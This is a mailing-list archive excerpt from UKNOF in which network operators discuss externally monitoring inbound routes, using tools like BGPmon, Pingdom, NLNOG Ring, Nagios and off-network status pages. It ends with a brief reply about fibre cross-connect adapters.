[Gavin Henry]

On 15 December 2013 18:11, David Farrell da...@david-farrell.net wrote:

 On 15 Dec 2013, at 14:45, Gavin Henry ghe...@suretec.co.uk wrote:

 So we're monitoring everything possible inside our network but
 wondered what others do to check routes that come in to your network
 via transit for latency/pl etc.? With the mixture of transit and
 public peering, even on our startup network, it's something to think
 about the best way. Also, how far out do you monitor? Just to your BGP
 peers or some known point after that? It's not good just pinging some
 public service as I'm sure they won't like it. I hear Pingdom and
 others but not sure.

 Pingdom in use here. We monitor some key nodes that run BGP with it, and some 
 other bits and pieces within our hosted services. We're thinking about using 
 some VPS boxes around the globe to perhaps obtain different insights into how 
 we appear to the rest of the world.

 David.

Ok, thanks. I've got BGPMon and set up a NLNOG Ring too. Internal to
outside monitoring is fine with Nagios (although looking at Opsview
right now and Observium) and SmokePing. Mainly all SNMP with traps and
Linux servers with NRPE.

We have one external VM that we are adding to as it routes over LINX
just now to us but want to check routes in via our two transit
providers.

-- 
Kind Regards,

Gavin Henry.

Re: [uknof] External monitoring of routes in to your network

[Gavin Henry]

On 15 December 2013 23:50, Charlie Boisseau char...@fluency.net.uk wrote:
 Gavin,

Hi Charlie,

 We’ve been working on this recently, so I can provide some insight here.

Only recently? You're a good few years ahead of us :-)

 We
 use Pingdom and BGPmon at the moment for basic reachability tests but it’s
 very basic so we we are in the process of beefing it up, and have taken a
 pretty belt and braces approach:

OK, cool. I set up BGPmon and noticed we're seeing AS-TRANS/AS23456 alerts.

 We’re replicating our internal monitoring (Nagios + Xymon) to an external VM
 hosted with Digital Ocean (but could easily be Amazon or similar).  This
 will mean our monitoring servers will be monitored which gives us some extra
 piece of mind.  It also means that we can host a status webpage for
 customers to access if we have a problem.

Yep, same plan here.

 The status page is on a completely separate domain name hosted on external
 DNS servers, just in case we have a problem that affects DNS.  We have
 integrated this to our broadcaster platform so that our admins can post an
 alert or maintenance window and it uses the Wordpress API to post it on the
 status page as well as emailing the affected customers as normal.

I think that's the only sane way to present things to customers. Oh,
your website is down
so can't check the service status :-)

 We also have the monitoring servers using an SMS API (I’m sure you know the
 one) to send text alerts in case emails can’t reach us.  The system sends me
 a ‘sanity’ text message every day at 6pm so we know even at quiet times that
 all is working correctly.

Yep. same here. We also have a daily job to dial in to our OoB modem
if all else fails :-)

 Ofcourse the on-net monitoring server will look out for the one hosted
 externally and visa-versa, so theoretically there would have to be multiple
 failures with both us and external parties for there to be a problem that we
 don’t know about.

We need a NLNOG Ring for community monitoring. I don't know if NLNOG
ring has alerts
but will check as I just created the VM last night.

-- 
Kind Regards,

Gavin Henry.

Re: [uknof] External monitoring of routes in to your network

[Gavin Henry]

 In a similar fashion, but with less hoop-jumping, there is the NLNOG Ring:
 https://ring.nlnog.net/

 In short: donate a VPS or Server, gain access to all of the others. There
 are some neat tools there to be used.

 Job did a presentation on it at UKNOF19, a few years back:
 http://www.uknof.org.uk/uknof19/Snijders-RING.pdf

Done. Looks great. Awaiting admins now.

-- 
Kind Regards,

Gavin Henry.

Re: [uknof] External monitoring of routes in to your network

[Gavin Henry]

 Thanks,

 Gavin.

Sorry for the massive sig!

Forgot.

Re: [uknof] Messed up Telehouse cable run order - LC to SC adapters false economy?

[Gavin Henry]

   However if your just driving the
 cross-connect I would suck up the loss get an LC-LC or SC-SC coupler
 from repsole as appropriate and then an LC-SC cable.

I'm going to do this and save some money.

Thanks!